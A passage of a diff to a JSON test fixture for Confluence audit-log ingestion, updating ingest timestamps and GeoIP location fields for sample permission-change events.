"number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -3282,7 +3084,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222433858Z", + "ingested": "2021-12-14T14:34:31.513213749Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.751Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -3367,20 +3169,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -3388,7 +3184,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222435741Z", + "ingested": "2021-12-14T14:34:31.513214244Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.744Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -3473,20 +3269,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -3494,7 +3284,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222437726Z", + "ingested": "2021-12-14T14:34:31.513214876Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.728Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEBLOG\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -3579,20 +3369,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -3600,7 +3384,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222439618Z", + "ingested": "2021-12-14T14:34:31.513215291Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.713Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -3678,20 +3462,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -3699,7 +3477,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222441508Z", + "ingested": "2021-12-14T14:34:31.513215714Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.705Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVECOMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -3784,20 +3562,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -3805,7 +3577,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222443401Z", + "ingested": "2021-12-14T14:34:31.513216191Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.688Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVECOMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -3890,20 +3662,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -3911,7 +3677,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222445293Z", + "ingested": "2021-12-14T14:34:31.513216595Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.675Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVECOMMENT\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -3996,20 +3762,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -4017,7 +3777,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222447176Z", + "ingested": "2021-12-14T14:34:31.513217020Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.668Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVECOMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -4095,20 +3855,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -4116,7 +3870,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222449108Z", + "ingested": "2021-12-14T14:34:31.513217407Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.654Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEPAGE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -4201,20 +3955,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -4222,7 +3970,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222451010Z", + "ingested": "2021-12-14T14:34:31.513217926Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.644Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEPAGE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -4307,20 +4055,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -4328,7 +4070,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222452910Z", + "ingested": "2021-12-14T14:34:31.513218671Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.639Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEPAGE\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -4413,20 +4155,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -4434,7 +4170,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222454777Z", + "ingested": "2021-12-14T14:34:31.513219202Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.634Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEPAGE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -4519,20 +4255,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -4540,7 +4270,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222456711Z", + "ingested": "2021-12-14T14:34:31.513219685Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.628Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"SETSPACEPERMISSIONS\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -4625,20 +4355,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -4646,7 +4370,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222458581Z", + "ingested": "2021-12-14T14:34:31.513220157Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.618Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"SETSPACEPERMISSIONS\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -4724,20 +4448,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -4745,7 +4463,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222460470Z", + "ingested": "2021-12-14T14:34:31.513220551Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.612Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -4830,20 +4548,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -4851,7 +4563,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222462360Z", + "ingested": "2021-12-14T14:34:31.513220940Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.606Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -4936,20 +4648,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": 